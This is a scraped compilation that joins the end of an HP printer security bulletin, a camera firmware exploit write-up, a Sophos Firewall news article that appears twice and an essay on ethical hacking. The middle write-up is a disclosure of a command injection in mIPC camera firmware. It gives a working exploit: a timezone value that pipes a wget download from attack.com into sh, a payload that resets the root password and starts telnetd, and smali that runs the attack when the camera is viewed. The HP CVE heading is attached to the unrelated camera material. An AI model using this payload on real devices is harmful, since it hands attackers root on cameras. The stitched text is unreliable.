HP OfficeJet 6950 All-in-One Printer series

P4C78A, P4C85A, T3P03A, P4C86A, P4C81A, P4C82A, P4C84A

Affected

Affected

001.2224A or higher

HP OfficeJet 6960 All-in-One Printer series

T0G25A, T0G26A

Affected

Affected

001.2225A or higher

HP OfficeJet 8010 All-in-One Printer series

1KR69A, 1KR58A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8010e All-in-One Printer series

228F5A

Affected

Not Affected

004.2222A or higher

HP OfficeJet 8022 All-in-One Printer

3UC65A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8022e All-in-One Printer

1K7K6A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 6960 All-in-One Printer series

J7K33A, T0F30A, T0F32A, T0F38A, T0F31A, J7K37A, J7K38A, J7K35A, J7K39A, T0F28A, T0F36A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 6970 All-in-One Printer series

J7K34A, T0F33A, T0F39A, T0F34A, T0F35A, J7K40A, J7K36A, J7K42A, J7K41A, T0F29A, T0F37A, T0F40A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 7720 Wide Format All-in-One Printer series

G5J56A, Y0S18A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7730 Wide Format All-in-One Printer

L3T99A, Y0S19A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7740 Wide Format All-in-One Printer series

G5J38A, T1P99A

Affected

Affected

002.2226A or higher

HP OfficeJet Pro 8020 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8020e All-in-One Printer series

1K7K7A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8030 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A, 3UC64A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8030e All-in-One Printer series

5LJ14A, 5LJ15A, 5LJ16A, 3UC66A, 4KJ65A, 5LJ23A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8035e All-in-One Printer

1L0H6A, 1L0H7A, 1L0H8A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8210 Printer series

D9L63A, D9L64A, J3P65A, J3P66A, J3P67A, J3P68A, T0G70A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8710 All-in-One Printer series

D9L18A, M9L66A, M9L67A, T0G46A, J6X76A, J6X78A, J6X80A, K7S37A, M9L70A, J6X77A, J6X81A, J6X79A, K7S38A, T0G47A, T0G48A, T0G49A, M9L65A

Not Affected

Affected

001.2224B or higher

HP OfficeJet Pro 8730 All-in-One Printer

D9L20A, K7S32A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8740 All-in-One Printer series

D9L21A, K7S42A, T0G65A, K7S39A, J6X83A, K7S43A, K7S40A, K7S41A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 9010 All-in-One Printer series

1KR46A, 3UK83A, 1KR49A, 1KR42A, 1KR45A, 3UK84A, 1KR48A, 1KR54A, 1KR55A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9010e All-in-One Printer series

257G3A

Affected

Not Affected

005.2210A or higher

HP OfficeJet Pro 9020 All-in-One Printer series

1MR78A, 1MR66A, 1MR67A, 1MR69A, 1MR70A, 1MR71A, 1MR72A, 1MR73A, 1MR74A, 1MR75A, 1MR76A, 1MR77A, 1MR68A, 1MR79A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9020e All-in-One Printer series

226Y9A, 1G5M0A

Affected

Not Affected

005.2210A or higher

HP Smart Tank 510 Wireless All-in-One series / HP Smart Tank Plus 550 Wireless All-in-One series

4SB23A, 3YW71A, 3YW74A, 1TJ09A, 3YW70A, 1TJ10A, 1TJ11A, 3YW73A, 6HF11A, 1TJ12A, 3YW72A, 3YW75A

Affected

Not Affected

001.2219A or higher

HP Smart Tank 610 Wireless All-in-One series / HP Smart Tank Plus 650 Wireless All-in-One series

Y0F71A, Y0F72A, Y0F73A, 7XV38A, Y0F74A, 3YW48A, 3YW51A

Affected

Not Affected

001.2219A or higher

HP Tango / HP Tango X

3DP64A, 3DP65A, 3DP66A, 3YF56A, 3YF57A, 3YF58A, 3YF60A, 3YF61A, 2RY54A, 2RY55A, 2RY56A, 3YF65A, 3YF66A, 3YF67A, 3YF68A, 3YF69A, 3YF70A, 3YF59A

Affected

Not Affected

2209A or higher

**HP LaserJet Pro printers**

Review the table for affected HP LaserJet Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

Affected

Not Affected

002\_2208A or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

Affected

Not Affected

002\_2208A or higher

**HP PageWide Pro printers**

Review the table for affected HP PageWide Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP PageWide 352dw Printer

J6U57A

Affected

Affected

2228B or higher

HP PageWide 377dw Multifunction Printer

J9V80A

Affected

Affected

2228B or higher

HP PageWide Managed P55250dw Printer series

J6U55A, J6U51B, J6U55B

Affected

Affected

2228B or higher

HP PageWide Managed P57750dw Multifunction Printer

J9V82A

Affected

Affected

2228B or higher

HP PageWide Managed P75050dn/dw

W1B28A, Y3Z45A W1B29A, Y3Z47A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dn Multifunction Printer

Y3Z57A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dw Multifunction Printer

W1B33A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740z Multifunction Printer

W1B39A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77750z Multifunction Printer

W1B37A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77760z Multifunction Printer

W1B38A

Affected

Affected

006.2225A or higher

HP PageWide Pro 452dn Printer series

D3Q15A

Affected

Affected

2228B or higher

HP PageWide Pro 452dw Printer series

D3Q16A

Affected

Affected

2228B or higher

HP PageWide Pro 477dn Multifunction Printer series

D3Q19A

Affected

Affected

2228B or higher

HP PageWide Pro 477dw Multifunction Printer series

D3Q20A

Affected

Affected

2228B or higher

HP PageWide Pro 552dw Printer series

D3Q17A

Affected

Affected

2228B or higher

HP PageWide Pro 577 Multifunction Printer series

D3Q21A, K9Z76A

Affected

Affected

2228B or higher

HP PageWide Pro 750dn Printer

Y3Z44A

Affected

Affected

006.2225A or higher

HP PageWide Pro 750dw Printer

A7W93A, Y3Z46A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dn Multifunction Printer

Y3Z54A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dw Multifunction Printer

W1B31A

Affected

Affected

006.2225A or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

September 21, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2022-28722: Certain HP Print Products - Potential Buffer Overflow, Remote Code Execution

Unsanitized input when setting a locale file leads to shell injection in mIPC camera firmware 5.3.1.2003161406. This allows an attacker to gain remote code execution on cameras running the firmware when a victim logs into a specially crafted mobile app.

\# mIPC firmware RCE By Joshua Wang Firmware version: v5.3.1.2003161406 (latest?) ## Overview Unsanitized input when setting a \`UTC(\\+|\\-).\*\` locale file leads to shell injection. A stack-based buffer overflow also exists. This allows an attacker to gain remote code execution, but requires the attacker to be authenticated in the mobile application to interface with the camera running mIPC. ## Vulnerability After receiving a firmware dump of a Lefun camera, which runs mIPC firmware, I noted the following in the startup process: - telnetd is killed - the root password is randomized and effectively un-bruteforceable I turned to searching through the mIPC binary for calls to \`system\`, looking for possible injections. The mIPC mobile application allows one to choose the timezone that the camera's system should operate with. I believe this is used for the on-screen display's time feature. One thing that stood out to me is that the firmware dump also included various different locale files for setting a timezone. \`\`\` ./backupfs/apps/app/ipc/data/cfg/zoneinfo/ ├── UTC+00\_00 ├── UTC+01\_00 ├── UTC-01\_00 ├── UTC+02\_00 ├── UTC-02\_00 ├── UTC+03\_00 ├── UTC-03\_00 ├── UTC+03\_30 ├── UTC-03\_30 ├── UTC+04\_00 ├── UTC-04\_00 ├── UTC+04\_30 ├── UTC-04\_30 ├── UTC+05\_00 ├── UTC-05\_00 ├── UTC+05\_30 ├── UTC+05\_45 ├── UTC+06\_00 ├── UTC-06\_00 ├── UTC+06\_30 ├── UTC+07\_00 ├── UTC-07\_00 ├── UTC+08\_00 ├── UTC-08\_00 ├── UTC+09\_00 ├── UTC-09\_00 ├── UTC+09\_30 ├── UTC-09\_30 ├── UTC+10\_00 ├── UTC-10\_00 ├── UTC+10\_30 ├── UTC+11\_00 ├── UTC-11\_00 ├── UTC+12\_00 ├── UTC+13\_00 └── UTC+14\_00 \`\`\` The vulnerable function is found at offset \`0x0013e91c\`. I re-labeled and re-typed the decompilation in Ghidra. \`\`\`c int choose\_utc\_timezone(undefined4 param\_1,char \*param\_2) { int iVar1; char \*pcVar2; char acStack192 \[128\]; char acStack64 \[40\]; if (param\_2 == (char \*)0x0) { iVar1 = -1; } else { strcpy(acStack64,param\_2); pcVar2 = strchr(acStack64,0x3a); if (pcVar2 != (char \*)0x0) { \*pcVar2 = '\_'; } iVar1 = access("/etc/TZ",0); if (iVar1 == 0) { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/TZ; cp /etc/TZ ../data/; ", acStack64); system(acStack192); } else { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/localtime; cp /etc/localtime ../ data/; " ,acStack64); system(acStack192); iVar1 = 0; } } return iVar1; } \`\`\` It appears that the name of a timezone filename is passed in through \`param\_2\`. It is then strcpy'd to \`acStack64\`. Then, it is formatted into a shell command using \`sprintf\` and then passed to \`system\`. The command copies a selected locale file from the previously mentioned directory into \`/etc/TZ\`, effectively setting the locale. It is important to note that mIPC by default uses another method to set a timezone besides copying a locale file, but these were not (to my knowledge) vulnerable due to sanitization. In this function, we can see two vulnerabilities. First, the \`strcpy\` allows us to copy more than 40 bytes into \`acStack64\`. One may argue that a length check occurred outside of this function, but I verified it experimentally and it indeed crashed the binary. Second, we can command-inject our way into the system! We just need our input to start with a valid locale filename (\`UTC+01\_00\`, etc) in order for the binary to reach this function (I also verified this experimentally). I could not find the parent calling function, but it may be that the developer used a \`strncmp\` and only verified the first couple bytes of input to match a valid locale filename. ## Exploitation I decided to exploit the command injection. Using APKtool, I dumped the mIPC mobile application and reverse engineered the behavior that sets timezones. I first instantiated a \`mcld\_ctx\_time\_set\` object. The definition for it: \`\`\` .class public Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; .super Lcom/mining/cloud/bean/mcld/mcld\_ctx; .source "mcld\_ctx\_time\_set.java" # instance fields .field public auto\_sync:I .field public day:I .field public hour:I .field public min:I .field public mon:I .field public ntp\_addr:Ljava/lang/String; .field public sec:I .field public timezone:Ljava/lang/String; .field public type:Ljava/lang/String; .field public year:I # direct methods .method public constructor <init>()V .locals 0 .line 6 invoke-direct {p0}, Lcom/mining/cloud/bean/mcld/mcld\_ctx;-><init>()V return-void .end method \`\`\` The locale filename (\`param\_2\`) is expected in the \`timezone\` field. Because of the buffer overflow, we are constrainted to < 40 characters in this injection, including the bytes at the beginning for a valid locale filename. Otherwise, we will crash the mIPC binary. To circumvent this, I decided to host my actual payload on a remote server, and execute it by calling \`wget\` and piping the output into \`sh\`. This gives me unlimited access to the shell. I set: - type == \`NTP\` - timezone == \`UTC+01\_00;wget -qO- attack.com|sh #\` - auto\_sync = 1 - sn == a serial number I got from calling \`McldActivityLivePlay->mSerialNumber\` - handler == \`McldActivityLivePlay->customTimeSetHandler\` I then invoked \`mcld\_agent->time\_set\` with this object and a couple other retrieved configurations to set the locale. See \[here\](#Full-payload) for the full thing. My remote payload just consisted of changing the root password with \`echo "root:root" | chpasswd\` and starting telnetd. Recall that the root password is randomized on startup. To make it easier for my coworker, Chris, to collect data (we were remote), I embedded my exploit into the \`onCreate\` method of the \`McIdActivityLivePlay\` class. This meant as soon as someone views the camera, the attack is run. I re-compiled the application with apktool, signed it, and installed it via ADB. !\[\](https://i.imgur.com/fBdlPHf.png) ## Full payload I learned way too much about Dalvik. \`\`\` new-instance v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; invoke-direct {v1}, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;-><init>()V const-string v2, "NTP" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->type:Ljava/lang/String; const-string v2, "UTC+01\_00;wget -qO- attack.com|sh #" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->timezone:Ljava/lang/String; const/4 v2, 0x1 iput v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->auto\_sync:I iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mSerialNumber:Ljava/lang/String; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->sn:Ljava/lang/String; iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->customTimeSetHandler:Landroid/os/Handler; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->handler:Landroid/os/Handler; iget-object v3, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mApp:Lcom/mining/cloud/application/McldApp; iget-object v3, v3, Lcom/mining/cloud/application/McldApp;->mAgent:Lcom/mining/cloud/mcld\_agent; invoke-virtual {v3, v1}, Lcom/mining/cloud/mcld\_agent;->time\_set(Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;)V \`\`\`

CVE-2022-40785: mIPC firmware RCE - HackMD

Code injection vulnerability harnessed in attacks on south Asia

John Leyden 26 September 2022 at 14:02 UTC  
Updated: 27 September 2022 at 08:50 UTC

Code injection vulnerability harnessed in attacks on south Asia

A recently resolved vulnerability in Sophos Firewall has been abused by attackers in targeted attacks, the vendor warns.

The critical vulnerability (CVE-2022-3236) poses a remote code execution (RCE) risk.

Sophos Firewall v19.0 MR1 (19.0.1) and older are potentially vulnerable to the security bug in the User Portal and Webadmin of Sophos Firewall.

Catch up on the latest network security news

In a security advisory published on Friday (September 23), Sophos said that it has issued a patch that installs automatically in default installations of its firewall technology.

This is just as well given the vulnerability has already featured in attacks in the wild.

“Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region,” the vendor’s advisory said. “We have informed each of these organizations directly.

“Sophos will provide further details as we continue to investigate,” it added.

Short of applying a patch, the vulnerability might be mitigated by disabling WAN access to the User Portal and Webadmin, Sophos advises.

The Daily Swig asked Sophos to explain in what ways the vulnerability has been exploited and how the problem was discovered.

In response, Sophos said it was alerted about the zero-day vulnerability by one of its customers. The vendor went on to reiterate that few of its customers were affected by the problem – without saying what issues they may have faced:

A customer notified Sophos, at which time Sophos took immediate steps to issue a hotfix, which was already applied last week. This only affected an extremely small subset of organizations.

The vulnerability is noteworthy since it represents a web security flaw in a network security product.

One infosec observer warned that the flaw is of the type that might lend itself to widespread abuse.

“This has a HIGH chance of mass exploitation, given the vulnerability is based on Code Injection (CWE-94) and if we look at the #CISA KEVs, at least 28 of those are Code Injection related,” said threat researcher Immanuel Chavoya in a post about the vulnerability on Twitter.

YOU MAY ALSO LIKE Vendor disputes seriousness of firewall plugin RCE flaw

Web security flaw in Sophos Firewall patched

Vendor patches code injection vulnerability harnessed in attacks on south Asia

John Leyden 26 September 2022 at 14:02 UTC

Vendor patches code injection vulnerability harnessed in attacks on south Asia

A recently resolved vulnerability in Sophos Firewall has been abused by attackers in targeted attacks, the vendor warns.

The critical vulnerability (CVE-2022-3236) poses a remote code execution (RCE) risk.

Sophos Firewall v19.0 MR1 (19.0.1) and older are potentially vulnerable to the security bug in the User Portal and Webadmin of Sophos Firewall.

Catch up on the latest network security news

In a security advisory published on Friday (September 23), Sophos said that it has issued a patch that installs automatically in default installations of its firewall technology.

This is just as well given the vulnerability has already featured in attacks in the wild.

“Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region,” the vendor’s advisory said. “We have informed each of these organizations directly.

“Sophos will provide further details as we continue to investigate,” it added.

Short of applying a patch, the vulnerability might be mitigated by disabling WAN access to the User Portal and Webadmin, Sophos advises.

The Daily Swig asked Sophos to explain in what ways the vulnerability has been exploited and how the problem was discovered.

In response, Sophos said it was alerted about the zero-day vulnerability by one of its customers. The vendor went on to reiterate that few of its customers were affected by the problem – without saying what issues they may have faced:

A customer notified Sophos, at which time Sophos took immediate steps issue a hotfix, which was already applied last week. This only affected an extremely small subset of organizations.

The vulnerability is noteworthy since it represents a web security flaw in a network security product.

One infosec observer warned that the flaw is of the type that might lend itself to widespread abuse.

“This has a HIGH chance of mass exploitation, given the vulnerability is based on Code Injection (CWE-94) and if we look at the #CISA KEVs, at least 28 of those are Code Injection related,” said threat researcher Immanuel Chavoya in a post about the vulnerability on Twitter.

YOU MAY ALSO LIKE Vendor disputes seriousness of firewall plugin RCE flaw

Attackers abuse web security flaw in Sophos Firewall

For white hats who play by the rules, here are several ethical tenets to consider.

Earlier this year when international cyber-gang Lapsus$ attacked major tech brands including Samsung, Microsoft, Nvidia and password manager Okta, an ethical line seemed to have been crossed for many cybercriminals.

Even by their murky standards, the extent of the breach, the disruption caused, and the profile of the businesses involved was just too much. So, the cybercrime community came together to punish Lapsus$ by leaking information on the group, a move that ultimately led to their arrest and breakup.

So maybe there's honor amongst thieves after all? Now, don't get me wrong; this isn't a pat on the back for cybercriminals, but it does indicate that at least some professional code is being followed.

Which raises a question for the wider law-abiding hacking community: Should we have our own ethical code of conduct? And if so, what might that look like?

**What Is Ethical Hacking?**

 First let's define ethical hacking. It is the process of assessing a computer system, network, infrastructure, or application with good intentions, to find vulnerabilities and security flaws that developers might have overlooked. Essentially, it's finding the weak spots before the bad guys do and alerting the organization, so it can avoid any big reputational or financial loss.

Ethical hacking requires, at a bare minimum, the knowledge and permission of the business or organization which is the subject of your attempted infiltration.

Here are five other guiding principles for activity to be considered ethical hacking.

**Hack To Secure**

An ethical and white-hat hacker coming to assess the security of any company will look for vulnerabilities, not only in the system but also in the reporting and information handling processes. The goal these hackers is to discover vulnerabilities, provide detailed insights, and make recommendations for building a secure environment. Ultimately, they're looking to make the organization more secure.

**Hack Responsibly**

Hackers must ensure they have permission, outlining clearly the extent of access the company is giving, as well as the scope of the work they are doing. This is very important. Target knowledge, and a clear scope, help prevent any accidental compromises and establish solid lines of communication if the hacker uncovers anything alarming. Responsibility, timely communication, and openness are vital ethical principles to abide by, and clearly distinguish a hacker from a cybercriminal and from the rest of the security team.

**Document Everything**

All good hackers keep detailed notes of everything they do during an assessment and log all command and tool output. First and foremost, this is to protect themselves. For example, if an issue occurs during a penetration test, the employer will look to the hacker first. Having a timestamped log of the activities performed, be it exploiting a system or scanning for malware, gives piece of mind to organizations by reminding them that hackers work with them, not against them.

Good notes uphold the ethical and legal side of things; they are also the basis of the report hackers will produce, even when there are no major findings. The notes will allow them to highlight the issues they have identified, the steps needed to reproduce the issues, and detailed suggestions on how to fix them.

**Keep Communications Active**

Open and timely communications should be clearly defined in the contract. Staying in communication throughout an assessment is key. Good practice is to always notify when assessments are running; a daily email with the assessment run times is vital.

While the hacker might not need to report all the vulnerabilities they find immediately to their client contact, they still should flag any critical, show-stopping flaw during an external penetration test. This could be an exploitable unauthenticated RCE or SQLi, a malicious code execution, or sensitive data disclosure vulnerability. When encountering these, hackers stop testing, issue a written vulnerability notification via email, and follow up with a phone call. This gives teams on the business side the chance to pause and fix the issue immediately if they choose. It's irresponsible to let a flaw of this magnitude go unflagged until the report is issued weeks later.

Hackers should keep their main points of contact aware of their progress and any major issues they discover as they proceed. This ensures everyone is aware of any issues ahead of the final report.

**Have a Hacker Mindset**

The term hacking was used even before information security grew in importance. It just means to use things in unintended ways. For this, hackers first seek to understand all the intended use cases of a system and take into consideration all its components.

Hackers must keep developing this mindset and never stop learning. This allows them to think both from a defensive and an offensive perspective and is useful when looking at something you have never experienced before. By creating best practices, understanding the target, and creating attack paths, a hacker can deliver amazing results.

Tag

#rce